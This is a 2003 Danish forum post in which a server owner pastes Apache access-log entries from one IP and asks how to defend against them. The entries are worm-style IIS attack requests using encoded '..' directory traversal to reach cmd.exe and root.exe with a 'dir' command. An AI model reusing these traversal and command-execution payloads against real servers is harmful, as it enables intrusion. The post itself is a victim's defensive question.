en uhyre mængde hacker forsøg...
Hejsad lige og faldt i staver over min Apache Access.log fil...
jeg har haft 213 hacking forsøg...
hvert eneste ser sådan her ud:
---
80.199.153.228 - - [31/Mar/2003:18:36:54 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
80.199.153.228 - - [31/Mar/2003:18:36:58 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268
80.199.153.228 - - [31/Mar/2003:18:37:22 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
80.199.153.228 - - [31/Mar/2003:18:37:26 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
80.199.153.228 - - [31/Mar/2003:18:37:29 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
80.199.153.228 - - [31/Mar/2003:18:37:32 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
80.199.153.228 - - [31/Mar/2003:18:37:36 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
80.199.153.228 - - [31/Mar/2003:18:37:39 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
80.199.153.228 - - [31/Mar/2003:18:37:45 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
80.199.153.228 - - [31/Mar/2003:18:37:48 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
80.199.153.228 - - [31/Mar/2003:18:37:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
80.199.153.228 - - [31/Mar/2003:18:37:54 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
80.199.153.228 - - [31/Mar/2003:18:38:00 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
80.199.153.228 - - [31/Mar/2003:18:38:03 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
80.199.153.228 - - [31/Mar/2003:18:38:07 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
80.199.153.228 - - [31/Mar/2003:18:38:10 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
---
I kan se en fuld liste over IPer der har angrebet mig på denne adresse (serveren kan være lidt tid om at svare, da listen genereres real-time)
http://mfa.ath.cx/view-my-attacks.php
som I nok kan se ud af IPerne, så er en masse af den fra TDC kunder unden fast IP...
MEN, hvad kan jeg gøre mod sådanne angreb?
Morten
